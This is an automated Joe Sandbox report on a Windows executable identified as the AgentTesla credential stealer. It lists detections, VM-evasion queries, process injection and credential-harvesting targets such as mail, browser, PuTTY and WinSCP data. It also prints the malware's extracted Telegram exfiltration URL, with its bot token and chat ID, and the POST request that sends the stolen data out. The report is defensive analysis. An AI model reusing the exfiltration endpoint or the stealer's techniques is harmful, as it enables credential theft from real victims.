Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
widnOAntje.exe

Overview

General Information

Sample Name:widnOAntje.exe
Analysis ID:830834
MD5:4d5ea75ef0273df2b1e2463dd7472cf1
SHA1:cdd8e983ba556f08faf43b29dcdc134658c39b55
SHA256:0b3b2b8094ce254dcd224e91a84b116e806b8cc7fc895fed43cf9ea350743338
Infos:

Detection

AgentTesla
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Telegram RAT
Yara detected AgentTesla
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Uses the Telegram API (likely for C&C communication)
Machine Learning detection for sample
Injects a PE file into a foreign processes
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Detected potential crypto function
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Binary contains a suspicious time stamp
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64native
  • widnOAntje.exe (PID: 5392 cmdline: C:\Users\user\Desktop\widnOAntje.exe MD5: 4D5EA75EF0273DF2B1E2463DD7472CF1)
    • widnOAntje.exe (PID: 4812 cmdline: C:\Users\user\Desktop\widnOAntje.exe MD5: 4D5EA75EF0273DF2B1E2463DD7472CF1)
  • cleanup
{"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot5494052141:AAF2aO4sQ_tu4BOnk0pmxB995km7Mslduy0/sendMessage?chat_id=1745136123"}
{"C2 url": "https://api.telegram.org/bot5494052141:AAF2aO4sQ_tu4BOnk0pmxB995km7Mslduy0/sendMessage"}
SourceRuleDescriptionAuthorStrings
00000005.00000002.25227665436.0000000003411000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000005.00000002.25227665436.0000000003411000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000005.00000002.25227665436.0000000003411000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        Process Memory Space: widnOAntje.exe PID: 4812JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          Process Memory Space: widnOAntje.exe PID: 4812JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 1 entries
            No Sigma rule has matched
            No Snort rule has matched

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: widnOAntje.exeVirustotal: Detection: 53%Perma Link
            Source: widnOAntje.exeReversingLabs: Detection: 33%
            Source: widnOAntje.exeJoe Sandbox ML: detected
            Source: 5.2.widnOAntje.exe.400000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot5494052141:AAF2aO4sQ_tu4BOnk0pmxB995km7Mslduy0/sendMessage?chat_id=1745136123"}
            Source: widnOAntje.exe.4812.5.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5494052141:AAF2aO4sQ_tu4BOnk0pmxB995km7Mslduy0/sendMessage"}
            Source: widnOAntje.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.11.20:49838 version: TLS 1.2
            Source: widnOAntje.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Networking

            barindex
            Source: unknownDNS query: name: api.telegram.org
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: global trafficHTTP traffic detected: POST /bot5494052141:AAF2aO4sQ_tu4BOnk0pmxB995km7Mslduy0/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8db2970d476aea6Host: api.telegram.orgContent-Length: 25217Expect: 100-continueConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: widnOAntje.exe, 00000005.00000002.25227665436.0000000003411000.00000004.00000800.00020000.00000000.sdmp, Cookies0.5.drString found in binary or memory: .www.linkedin.combscookie/ equals www.linkedin.com (Linkedin)
            Source: Cookies0.5.drString found in binary or memory: .www.linkedin.combscookiev10 equals www.linkedin.com (Linkedin)
            Source: widnOAntje.exe, 00000005.00000002.25227665436.00000000034B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
            Source: widnOAntje.exe, 00000005.00000002.25256951692.0000000006657000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: widnOAntje.exe, 00000005.00000002.25256951692.0000000006657000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: widnOAntje.exe, 00000005.00000002.25227665436.0000000003490000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: widnOAntje.exe, 00000005.00000002.25227665436.0000000003490000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: widnOAntje.exe, 00000005.00000002.25227665436.0000000003411000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5494052141:AAF2aO4sQ_tu4BOnk0pmxB995km7Mslduy0/
            Source: widnOAntje.exe, 00000005.00000002.25227665436.0000000003490000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5494052141:AAF2aO4sQ_tu4BOnk0pmxB995km7Mslduy0/sendDocument
            Source: widnOAntje.exeString found in binary or memory: https://krdict.korean.go.kr/api/search?key=AEBB6D3290D88C645CF1452F7DA3229D0
            Source: widnOAntje.exeString found in binary or memory: https://picsum.photos/80
            Source: unknownHTTP traffic detected: POST /bot5494052141:AAF2aO4sQ_tu4BOnk0pmxB995km7Mslduy0/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8db2970d476aea6Host: api.telegram.orgContent-Length: 25217Expect: 100-continueConnection: Keep-Alive
            Source: unknownDNS traffic detected: queries for: api.telegram.org
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.11.20:49838 version: TLS 1.2
            Source: widnOAntje.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: C:\Users\user\Desktop\widnOAntje.exeCode function: 5_2_032140D8
            Source: C:\Users\user\Desktop\widnOAntje.exeCode function: 5_2_03214CF0
            Source: C:\Users\user\Desktop\widnOAntje.exeCode function: 5_2_03214420
            Source: C:\Users\user\Desktop\widnOAntje.exeCode function: 5_2_05FE8720
            Source: C:\Users\user\Desktop\widnOAntje.exeCode function: 5_2_05FE3908
            Source: C:\Users\user\Desktop\widnOAntje.exeCode function: 5_2_05FECD50
            Source: C:\Users\user\Desktop\widnOAntje.exeCode function: 5_2_05FE7064
            Source: widnOAntje.exe, 00000001.00000000.20166036636.00000000006B2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameOnJd.exe: vs widnOAntje.exe
            Source: widnOAntje.exe, 00000005.00000002.25216403568.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilename6b780de2-3488-4d15-9dee-b8809a079c43.exe4 vs widnOAntje.exe
            Source: widnOAntje.exe, 00000005.00000002.25217636951.00000000012F8000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs widnOAntje.exe
            Source: widnOAntje.exeBinary or memory string: OriginalFilenameOnJd.exe: vs widnOAntje.exe
            Source: C:\Users\user\Desktop\widnOAntje.exeSection loaded: edgegdi.dll
            Source: C:\Users\user\Desktop\widnOAntje.exeSection loaded: edgegdi.dll
            Source: widnOAntje.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: widnOAntje.exeVirustotal: Detection: 53%
            Source: widnOAntje.exeReversingLabs: Detection: 33%
            Source: C:\Users\user\Desktop\widnOAntje.exeFile read: C:\Users\user\Desktop\widnOAntje.exe:Zone.IdentifierJump to behavior
            Source: widnOAntje.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\widnOAntje.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknownProcess created: C:\Users\user\Desktop\widnOAntje.exe C:\Users\user\Desktop\widnOAntje.exe
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess created: C:\Users\user\Desktop\widnOAntje.exe C:\Users\user\Desktop\widnOAntje.exe
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess created: C:\Users\user\Desktop\widnOAntje.exe C:\Users\user\Desktop\widnOAntje.exe
            Source: C:\Users\user\Desktop\widnOAntje.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\InprocServer32
            Source: C:\Users\user\Desktop\widnOAntje.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Users\user\Desktop\widnOAntje.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\widnOAntje.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\widnOAntje.exe.logJump to behavior
            Source: classification engineClassification label: mal96.troj.spyw.evad.winEXE@3/4@1/1
            Source: C:\Users\user\Desktop\widnOAntje.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: widnOAntje.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            Source: C:\Users\user\Desktop\widnOAntje.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
            Source: C:\Users\user\Desktop\widnOAntje.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
            Source: C:\Users\user\Desktop\widnOAntje.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Users\user\Desktop\widnOAntje.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: widnOAntje.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: widnOAntje.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: widnOAntje.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: widnOAntje.exeStatic PE information: 0xC839C00D [Fri Jun 12 22:51:57 2076 UTC]
            Source: initial sampleStatic PE information: section name: .text entropy: 7.606320578559565
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\widnOAntje.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Source: C:\Users\user\Desktop\widnOAntje.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Users\user\Desktop\widnOAntje.exe TID: 3988Thread sleep time: -40023s >= -30000s
            Source: C:\Users\user\Desktop\widnOAntje.exe TID: 1872Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\Desktop\widnOAntje.exe TID: 2680Thread sleep count: 1900 > 30
            Source: C:\Users\user\Desktop\widnOAntje.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\widnOAntje.exeWindow / User API: threadDelayed 1900
            Source: C:\Users\user\Desktop\widnOAntje.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Users\user\Desktop\widnOAntje.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\widnOAntje.exeThread delayed: delay time: 40023
            Source: C:\Users\user\Desktop\widnOAntje.exeThread delayed: delay time: 922337203685477
            Source: widnOAntje.exe, 00000005.00000002.25219102822.0000000001637000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\widnOAntje.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Users\user\Desktop\widnOAntje.exeMemory written: C:\Users\user\Desktop\widnOAntje.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\widnOAntje.exeProcess created: C:\Users\user\Desktop\widnOAntje.exe C:\Users\user\Desktop\widnOAntje.exe
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Users\user\Desktop\widnOAntje.exe VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
